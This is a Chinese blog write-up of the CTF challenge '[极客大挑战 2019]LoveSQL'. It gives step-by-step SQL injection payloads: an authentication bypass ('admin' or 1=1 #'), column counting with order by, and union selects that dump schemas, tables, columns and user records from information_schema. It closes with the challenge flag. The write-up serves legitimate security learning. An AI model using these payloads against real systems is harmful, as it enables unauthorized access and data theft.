首页 > 数据库 >[极客大挑战 2019]LoveSQL 1

[极客大挑战 2019]LoveSQL 1

时间:2024-11-08 18:41:09浏览次数:4  
标签:username 极客 fu 23 LoveSQL 2019 ji kuai password

[极客大挑战 2019]LoveSQL 1

代码审计,发现表单方式为get提交到check.php

image-20241105083124644

万能密码

admin' or 1=1 #

image-20241105083619218

登录成功,这边我以为密码就是flag,结果并不是,结合题目信息,猜想这应该是根据账号密码的注入

image-20241105083633321

尝试闭合?username=admin' and 1=1%23&password=d3c9cf30a12d1f13d4f778859fb16f73正常显示,?username=admin' and 1=2%23&password=d3c9cf30a12d1f13d4f778859fb16f73显示账号密码错误

image-20241105084835580

存在闭合注入,order by探测字段,order by 4,显示列错误,判断出字段数为3

?username=admin' order by 4%23&password=d3c9cf30a12d1f13d4f778859fb16f73

image-20241105085010073


这边有个小坑,之前一直用admin来做账号,结果发现闭合之后随便都是登录进去的,导致union显示不出来注入点,所以随便改了个username,然后进行union联合点查找

?username=abc' union select 1,2,3%23&password=111

image-20241105085749956

根据显示判断2和3都是注入点(怀疑sql是这么写的:username=${username} and password=${password},心可真大)

爆库(回显3为例)

?username=abc' UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata%23&password=111

image-20241105090127015

发现数据库geek,爆表

?username=abc' UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema="geek"%23&password=111

image-20241105090254895

发现两个表,爆字段

?username=abc' UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1"%23&password=111

image-20241105090607597

爆值

?username=abc' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=111

image-20241105091000630

太长了我复制下来

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{0430bf83-c7cb-403f-8965-54dae295b134}'

成功找到flag

flag{0430bf83-c7cb-403f-8965-54dae295b134}

标签:username,极客,fu,23,LoveSQL,2019,ji,kuai,password
From: https://www.cnblogs.com/tazmi/p/18535687

相关文章

  • Microsoft Office 2019 (office全家桶)for Mac/Windows电脑安装包
    MicrosoftOffice2019forMac(Office全家桶)是一款功能全面且强大的办公软件套件,专为Mac用户设计。Mac苹果电脑下载:Office2019(含激活秘钥)Windows电脑下载:Office2019(含批量许可)    以下是其主要特点和优势:一、界面设计采用了Mac系统的设......
  • 不管你是什么客,帽客,极客,杰克,交易客,博客,博弈客,旅客…嗯那头巨鲸惊醒了,睡醒沉睡了一个世
    特朗普作为交易员的掌舵人,具有剁手的品质,他能够顺利到达彼岸的原因只有一个,他的止损打的很大,你是猜不到是多大的?全无古人的支持.没有像他这种,Comeon二进宫的人.他所惧怕的也只有一个,后面来的人,他的儿子小唐纳德.你的反应很迟钝呢,中国外交部的都在发了电报祝贺特朗普了,你还......
  • CF1270 Good Bye 2019
    Dashboard玩构造玩的,服了。A拥有最大牌的必胜。linkB若相邻的差\(\ge2\)则有解,否则根据变化连续性一定无解。linkC加两个数,第一个数为之前所有数的异或和。加进来之后异或为0。第二个数为加完第一个数之后的和。linkD考虑\(k=n-1\)时,分别询问除去每个数之后的第\(......
  • 基于Arcgis10.8+VS2019的ArcObjectsSDKNet安装
    基于Arcgis10.8+VS2019的ArcObjectsSDKNet安装首先Arcgis10.8和Arcgis10.8.1所需要的ArcObjectsSDKNet版本是不同的在使用10.8的ArcObjectsSDKNet在Arcgis10.8.1的基础上是安装不了的,会检测不到在安装Arcgis10.8的基础上,下载Arcgis10.8的ArcObjectsSDKNet,解压后进行安装连接......
  • P5308 [COCI2018-2019#4] Akvizna
    原题链接奶龙题,主要是凸性的证明,然后wqs二分求解即可。轮数的选择是\(1\)~\(n\),假如是\(1\)轮,答案显然为\(1\),为\(n\)轮,答案就是\(\sum_{i=1}^{n}i^{-1}\),从这里就可以直接猜出凸性了。然后是不考虑轮数限制的求法,直接dp即可:\(f_{i}=\max\{f_j+\frac{i-j}{i}\}\),......
  • 2024-三叶草安全技术小组第十五届"极客大挑战" wp
    Crypto1.凯撒加密YEI{CKRIUSK_ZU_2024_MKKQ_INGRRKTMK}6位SYC{WELCOME_TO_2024_GEEK_CHALLENGE}2.RSA原文:fromCrypto.Util.numberimportbytes_to_long,getPrimefromsecretimportflagp=getPrime(128)q=getPrime(128)n=p*qe=65537m=bytes_to_long(fla......
  • JOI Open 2019 Triple Jump 题解
    原题链接可以暴力枚举\(a,b\),然后\(c\in[2b-a,n]\),找区间最大值即可。对于我们选择的\(a,b\)间,若能在\((a,b)\)中找到某个下标\(i\),满足\(h_i\geh_a\)或\(h_i\geh_b\),那么选择\(i\)是更优的。理由很简单,无论是从\(a\toi\)还是从\(b\toi\),都会扩大\(c\)的......
  • [RoarCTF 2019]Easy Calc
    题目链接:https://buuoj.cn/challenges#[RoarCTF2019]EasyCalc打开环境后如下所示。查看该页面的源代码,发现存在"calc.php"文件,同时,提示设置了WAF。访问"calc.php"文件,发现该页面打印出了PHP源码。即。<?phperror_reporting(0);if(!isset($_GET['num'])){s......
  • [极客大挑战 2019]BuyFlag
    题目链接:https://buuoj.cn/challenges#[极客大挑战2019]BuyFlag打开环境后如下所示。发现右侧中存在一个菜单,并有"PAYFLAG"选项卡,访问其后,响应包如下。HTTP/1.1200OKServer:openrestyDate:Fri,25Oct202415:00:41GMTContent-Type:text/html;charset=UTF-8Con......
  • [ZJCTF 2019]NiZhuanSiWei
    题目链接:https://buuoj.cn/challenges#[ZJCTF2019]NiZhuanSiWei打开环境后如下所示。<?php$text=$_GET["text"];$file=$_GET["file"];$password=$_GET["password"];if(isset($text)&&(file_get_contents($text,'r')===......